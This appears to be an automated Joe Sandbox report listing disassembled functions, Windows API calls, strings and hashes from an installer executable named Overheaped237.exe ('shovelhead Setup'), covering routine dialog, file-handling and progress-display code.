Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A

Function 00404191 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
GetDlgItem.USER32(00000000,000003E8), ref: 00404230
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
GetSysColor.USER32(?), ref: 0040425F
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
lstrlenA.KERNEL32(?), ref: 00404280
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
GetDlgItem.USER32(?,0000040A), ref: 00404306
SendMessageA.USER32(00000000), ref: 00404309
GetDlgItem.USER32(?,000003E8), ref: 00404334
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
LoadCursorA.USER32(00000000,00007F02), ref: 00404383
SetCursor.USER32(00000000), ref: 0040438C
ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
SetCursor.USER32(00000000), ref: 004043AF
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF

Strings

aP, xrefs: 004042E5
open, xrefs: 00404397
Remove folder: , xrefs: 0040435F
N, xrefs: 00404322
\A@, xrefs: 00404394

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$Remove folder: $\A@$open$aP
API String ID: 3615053054-3282653364
Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5

Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8

Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
wsprintfA.USER32 ref: 00405C23
GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
GlobalFree.KERNEL32(00000000), ref: 00405D0C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Strings

[Rename], xrefs: 00405C8D, 00405C9F
%s=%s, xrefs: 00405C19
NUL, xrefs: 00405BB5

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
Opcode Fuzzy Hash: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD

Function 004060CE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Overheaped237.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406126
CharNextA.USER32(?,?,?,00000000), ref: 00406133
CharNextA.USER32(?,"C:\Users\user\Desktop\Overheaped237.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406138
CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406148

Strings

*?|<>/":, xrefs: 00406116
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004060CF
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 0040610A

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Overheaped237.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1362907294
Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D

Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040CC
GetSysColor.USER32(00000000), ref: 004040E8
SetTextColor.GDI32(?,00000000), ref: 004040F4
SetBkMode.GDI32(?,?), ref: 00404100
GetSysColor.USER32(?), ref: 00404113
SetBkColor.GDI32(?,?), ref: 00404123
DeleteObject.GDI32(?), ref: 0040413D
CreateBrushIndirect.GDI32(?), ref: 00404147

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55

Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
GetTickCount.KERNEL32 ref: 00402C4D
wsprintfA.USER32 ref: 00402C7B

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
ShowWindow.USER32(00000000,00000005), ref: 00402CAD

Part of subcall function 00402BFB: MulDiv.KERNEL32(000DBC3B,00000064,000DB9FE), ref: 00402C10

Strings

... %d%%, xrefs: 00402C75

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E

Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
GetMessagePos.USER32 ref: 0040496A
ScreenToClient.USER32(?,?), ref: 00404984
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC

Strings

f, xrefs: 00404998

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5

Function 00402B7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
wsprintfA.USER32 ref: 00402BCE
SetWindowTextA.USER32(?,?), ref: 00402BDE
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0

Strings

verifying installer: %d%%, xrefs: 00402BC3
unpacking data: %d%%, xrefs: 00402BBC, 00402BCC

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98

Function 0040483D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(shovelhead Setup: Completed,shovelhead Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
wsprintfA.USER32 ref: 004048E3
SetDlgItemTextA.USER32(?,shovelhead Setup: Completed), ref: 004048F6

Strings

shovelhead Setup: Completed, xrefs: 004048CD, 004048D2, 004048D8, 004048EC
%u.%u%s%s, xrefs: 004048C5

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$shovelhead Setup: Completed
API String ID: 3540041739-2120503255
Opcode ID: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
Opcode Fuzzy Hash: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
